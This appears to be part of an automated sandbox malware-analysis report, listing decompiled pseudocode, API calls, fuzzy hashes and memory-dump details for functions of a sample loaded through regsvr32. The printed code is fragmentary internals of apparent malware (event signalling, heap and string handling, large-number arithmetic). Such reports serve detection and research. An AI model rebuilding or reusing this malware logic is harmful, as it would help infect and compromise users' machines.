			E02AF64A2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x2afa348; // 0x248d5a8
				_t2 = _t22 + 0x2afb67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x2afa2ec >= 5) {
					_t30 = E02AF3643(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x2afa2ec =  *0x2afa2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E02AF7194(_t50, _t49);
					_t34 = E02AF1EDF(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x2afa2ec < 5) {
							 *0x2afa2ec =  *0x2afa2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E02AF14C6();
					HeapFree( *0x2afa2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x2afa3e0; // 0x4f89bc8
				if(RtlAllocateHeap( *0x2afa2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E02AF6CA4(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x02af64a9
0x02af64b0
0x02af64b4
0x02af64b9
0x02af64c4
0x02af64d4
0x02af6523
0x02af6528
0x02af6528
0x02af652b
0x02af652f
0x02af6569
0x02af6569
0x02af656f
0x02af6576
0x02af6576
0x02af6531
0x02af6534
0x02af6536
0x02af6543
0x02af6545
0x02af654c
0x02af6583
0x02af6588
0x02af658a
0x02af658c
0x02af658c
0x00000000
0x02af658a
0x02af654e
0x02af6555
0x02af6563
0x00000000
0x02af6563
0x02af64d6
0x02af64f1
0x02af650b
0x00000000
0x02af650b
0x02af6504
0x00000000

APIs

wsprintfA.USER32 ref: 02AF64C4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02AF64E9

Part of subcall function 02AF6CA4: GetTickCount.KERNEL32 ref: 02AF6CBB
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6D08
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6D25
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6D47
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6D6E
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6D8F
Part of subcall function 02AF6CA4: wsprintfA.USER32 ref: 02AF6DBA
Part of subcall function 02AF6CA4: HeapFree.KERNEL32(00000000,?), ref: 02AF6DCD

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02AF6563

Strings

Uqt, xrefs: 02AF6563

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uqt
API String ID: 1307794992-2320327147
Opcode ID: 7f32860cb215f8987849ec9660b2a48328cf747db83b136fb0402dfc4a19e73a
Instruction ID: 92a8d0d79f2785d72013f55d5ea3351987bb5cf5116675e1805906a59eda10c4
Opcode Fuzzy Hash: 7f32860cb215f8987849ec9660b2a48328cf747db83b136fb0402dfc4a19e73a
Instruction Fuzzy Hash: A0312B71940209EBCB81DFD5D984ADA7BBDAB08744F108412FB05A7211DF39E556CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AF55F9 Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02AF55F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2afa348; // 0x248d5a8
					_t5 = _t103 + 0x2afb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2af9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2afa348; // 0x248d5a8
												_t28 = _t109 + 0x2afb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2afa348; // 0x248d5a8
														_t33 = _t79 + 0x2afb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02af55fe
0x02af5607
0x02af5608
0x02af560c
0x02af5612
0x02af5618
0x02af5621
0x02af5627
0x02af5631
0x02af5633
0x02af5639
0x02af563e
0x02af5649
0x02af564f
0x02af5654
0x02af5776
0x02af565a
0x02af565a
0x02af5667
0x02af566d
0x02af5673
0x02af5677
0x02af567d
0x02af568a
0x02af568e
0x02af5694
0x02af5697
0x02af569f
0x02af56a0
0x02af56a4
0x02af56a8
0x02af56ab
0x02af56ae
0x02af56b4
0x02af56bd
0x02af56c3
0x02af56c4
0x02af56c7
0x02af56c8
0x02af56c9
0x02af56d1
0x02af56d2
0x02af56d3
0x02af56d5
0x02af56d9
0x02af56dd
0x00000000
0x00000000
0x02af56e3
0x02af56ec
0x02af56f2
0x02af56fc
0x02af5700
0x02af5702
0x02af570f
0x02af5713
0x02af571b
0x02af5720
0x02af5732
0x02af5734
0x02af573a
0x02af573a
0x02af5743
0x02af5743
0x02af5745
0x02af574b
0x02af574b
0x02af574e
0x02af5754
0x02af5757
0x02af5760
0x00000000
0x00000000
0x00000000
0x02af5760
0x02af56b4
0x02af56ae
0x02af5697
0x02af5766
0x02af5766
0x02af576c
0x02af576c
0x02af5772
0x02af5772
0x02af577b
0x02af5781
0x02af5781
0x02af563e
0x02af578a

APIs

SysAllocString.OLEAUT32(02AF9284), ref: 02AF5649
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02AF572A
SysFreeString.OLEAUT32(00000000), ref: 02AF5743
SysFreeString.OLEAUT32(?), ref: 02AF5772

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 706bbb6ecf7f4eb8879d7b2231b81501f602426916ddd1c9c2c7ca9d004c393a
Instruction ID: 6cbbc73750fc09360609178197f635f44a0dd3270a93dc85f775133aef6c11e0
Opcode Fuzzy Hash: 706bbb6ecf7f4eb8879d7b2231b81501f602426916ddd1c9c2c7ca9d004c393a
Instruction Fuzzy Hash: 70514D75D00509EFCB50DFE8C588DAEB7B6EF88705B144984FA15EB214DB35AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF1335 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02AF1370
SysFreeString.OLEAUT32(00000000), ref: 02AF1455

Part of subcall function 02AF55F9: SysAllocString.OLEAUT32(02AF9284), ref: 02AF5649

SafeArrayDestroy.OLEAUT32(00000000), ref: 02AF14A8
SysFreeString.OLEAUT32(00000000), ref: 02AF14B7

Part of subcall function 02AF43F6: Sleep.KERNEL32(000001F4), ref: 02AF443E

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: ae10aa846f068bda3fdaea801cdaf71bcc07e7522169c9293aadd4f47a326987
Instruction ID: 2d88aa215e6c4da3400a3abab4af176b5bfd6d8b8b4358cb521c3afcb14f154d
Opcode Fuzzy Hash: ae10aa846f068bda3fdaea801cdaf71bcc07e7522169c9293aadd4f47a326987
Instruction Fuzzy Hash: 14515F75900609EFDB41DFE8C984AAAB7B6BF88705B148869F619DB210EF38D905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF19D1 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02AF19D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02AF43E5(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02AF17D5(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02AF4376(_t101,  &_v428, _a8, _t96 - _t81);
					E02AF4376(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02AF17D5(_t101, 0x2afa1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02AF17D5(_a16, _a4);
						E02AF71DF(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02AF82AA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02AF82A4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02AF3506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02AF5422(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02AF4CD2(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2afa1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02af19d4
0x02af19e0
0x02af19e6
0x02af19eb
0x02af19ef
0x02af1b61
0x02af1b65
0x02af1b65
0x02af19f5
0x02af19f9
0x02af19fd
0x02af1a00
0x02af1a0b
0x02af1a11
0x02af1a16
0x02af1a19
0x02af1a33
0x02af1a42
0x02af1a4e
0x02af1a58
0x02af1a5d
0x02af1a5f
0x02af1a62
0x02af1b19
0x02af1b1f
0x02af1b30
0x02af1b43
0x02af1b59
0x00000000
0x02af1b5e
0x02af1a6b
0x02af1a72
0x02af1a76
0x02af1a7c
0x02af1a7e
0x02af1a80
0x02af1a82
0x02af1a84
0x02af1a8e
0x02af1a93
0x02af1a95
0x02af1a97
0x02af1a98
0x02af1a99
0x02af1a9a
0x02af1aa1
0x02af1aa8
0x02af1aab
0x02af1aab
0x02af1a78
0x02af1a78
0x02af1a78
0x02af1ab3
0x02af1abb
0x02af1ac7
0x02af1acc
0x02af1acc
0x02af1ad1
0x00000000
0x00000000
0x02af1ad3
0x02af1ad6
0x02af1ae3
0x00000000
0x00000000
0x02af1ae5
0x02af1ae5
0x02af1af2
0x02af1acc
0x02af1ad1
0x00000000
0x00000000
0x00000000
0x02af1ad1
0x02af1afc
0x02af1aff
0x02af1b02
0x02af1b09
0x02af1b09
0x02af1b16
0x00000000
0x02af1b16
0x02af1a02
0x02af1a06
0x02af1a07
0x02af1a09
0x00000000
0x00000000
0x00000000
0x02af1a09
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02AF1A84
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02AF1A9A
memset.NTDLL ref: 02AF1B43
memset.NTDLL ref: 02AF1B59

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 89f0afb0b5f310d4305ae306623eb08ed288a8d29a04797f35fde8b9915720d7
Instruction ID: 324c5010fac8c8ec82c982f51038015a06639aa109123698e04cc1b03cc82412
Opcode Fuzzy Hash: 89f0afb0b5f310d4305ae306623eb08ed288a8d29a04797f35fde8b9915720d7
Instruction Fuzzy Hash: 97417F31A00219EFDB50AFA8DD84BDE7776EF45310F004569BA1AA7280EF78AE558F50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF797A Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02AF797A(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2afa310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2afa348; // 0x248d5a8
				_t3 = _t8 + 0x2afb87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E02AF6702(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2afa34c, 1, 0, _t30);
					E02AF789E(_t30);
				}
				_t12 =  *0x2afa2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02AF7256() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02AF3BF0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2afa124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02AF5854(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02af797b
0x02af7982
0x02af798c
0x02af7990
0x02af7996
0x02af79a5
0x02af79ac
0x02af79b0
0x02af79c2
0x02af79c4
0x02af79c4
0x02af79c9
0x02af79d0
0x02af7a27
0x02af7a27
0x02af7a2d
0x02af7a2f
0x02af7a2f
0x02af7a39
0x02af7a3d
0x02af7a4f
0x02af7a4f
0x02af7a53
0x02af7a59
0x02af7a59
0x00000000
0x02af79e9
0x02af79ee
0x02af79f6
0x02af79fa
0x02af79fe
0x02af79fe
0x02af7a0b
0x02af7a0f
0x02af7a13
0x02af7a68
0x02af7a6e
0x02af7a6e
0x02af7a21
0x02af7a25
0x02af7a5c
0x02af7a5e
0x02af7a61
0x02af7a61
0x00000000
0x02af7a5e
0x02af7a25
0x00000000
0x02af7a0f

APIs

Part of subcall function 02AF6702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04F89DC0,00000000,?,?,69B25F44,00000005,02AFA00C,4D283A53,?,?), ref: 02AF6738
Part of subcall function 02AF6702: lstrcpy.KERNEL32(00000000,00000000), ref: 02AF675C
Part of subcall function 02AF6702: lstrcat.KERNEL32(00000000,00000000), ref: 02AF6764

CreateEventA.KERNEL32(02AFA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02AF68D0,?,?,?), ref: 02AF79BB

Part of subcall function 02AF789E: RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

WaitForSingleObject.KERNEL32(00000000,00004E20,02AF68D0,00000000,00000000,?,00000000,?,02AF68D0,?,?,?), ref: 02AF7A1B
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02AF68D0,?,?,?), ref: 02AF7A49
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02AF68D0,?,?,?), ref: 02AF7A61

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: caf16048d8c2fd1dbd932c2fd3739b0b671655621a366f404a3dbb7ee93d8582
Instruction ID: 03886716e86698b9e78cc40c897e6b61ee1b58d94335d7b0fb88c9240ba72d31
Opcode Fuzzy Hash: caf16048d8c2fd1dbd932c2fd3739b0b671655621a366f404a3dbb7ee93d8582
Instruction Fuzzy Hash: C42128329803129BC7F16BE89CC4BABF7A9AB4CB14F060625FF55D7104DF2CCA018694

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6821 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E02AF6821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02AF6413(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02AF14E2(_t23);
						}
					}
					return _t38;
				}
				if(E02AF1CE6(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2afa34c, 1, 0,  *0x2afa3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02AF155C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02AF2331(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02AF1544(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02AF797A( &_v32, _t39);
					goto L13;
				}
			}

0x02af6821
0x02af682e
0x02af6834
0x02af6835
0x02af6836
0x02af6837
0x02af6838
0x02af683c
0x02af6848
0x02af684c
0x02af68d4
0x02af68d4
0x02af68d7
0x02af68d9
0x02af68e1
0x02af68e7
0x02af68ea
0x02af68ea
0x02af68e7
0x02af68f5
0x02af68f5
0x02af685f
0x02af6861
0x02af6861
0x02af6878
0x02af687c
0x02af687f
0x02af688a
0x02af6891
0x02af6891
0x02af689a
0x02af689e
0x02af68ac
0x02af68a0
0x02af68a0
0x02af68a1
0x02af68a2
0x02af68a3
0x02af68a4
0x02af68a5
0x02af68a5
0x02af68b1
0x02af68b4
0x02af68b8
0x02af68ba
0x02af68ba
0x02af68c1
0x00000000
0x02af68c3
0x02af68c3
0x02af68d0
0x00000000
0x02af68d0

APIs

CreateEventA.KERNEL32(02AFA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 02AF6872
SetEvent.KERNEL32(00000000), ref: 02AF687F
Sleep.KERNEL32(00000BB8), ref: 02AF688A
CloseHandle.KERNEL32(00000000), ref: 02AF6891

Part of subcall function 02AF155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,02AF68B1,?,02AF68B1,?,?,?,?,?,02AF68B1,?), ref: 02AF1636

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: e06ba1134da409d9efd61136c0819e2e2c24ea5b450dda7d9bd10e40a2e3d2cb
Instruction ID: 7c8f71b92ff45bf1a58219b3e1b3757c1b079810099e041b017ff8a9444a5938
Opcode Fuzzy Hash: e06ba1134da409d9efd61136c0819e2e2c24ea5b450dda7d9bd10e40a2e3d2cb
Instruction Fuzzy Hash: 65215072D40229ABDBA0AFE4C8C4DEEB7BDAB44754B014469FB65A7100DF3CD9458FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6643 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02AF6643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02AF7A71(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02af664f
0x02af6653
0x02af6654
0x02af6655
0x02af6657
0x02af6659
0x02af665c
0x02af6661
0x02af66f8
0x02af66ff
0x02af66ff
0x02af666a
0x02af6671
0x02af6681
0x02af6681
0x02af6687
0x02af6689
0x02af668e
0x02af6697
0x02af669d
0x02af66a2
0x02af66ad
0x02af66b1
0x02af66b3
0x02af66b4
0x02af66bd
0x02af66c1
0x02af66d2
0x02af66c3
0x02af66c8
0x02af66cd
0x02af66dc
0x02af66dc
0x02af66b1
0x02af66e2
0x02af66e8
0x02af66e8
0x02af66f1
0x02af66f6
0x02af66f6
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02AF6671
lstrlenW.KERNEL32(?), ref: 02AF66A7
memcpy.NTDLL(00000000,?,?,?), ref: 02AF66C8
SysFreeString.OLEAUT32(?), ref: 02AF66DC

Memory Dump Source

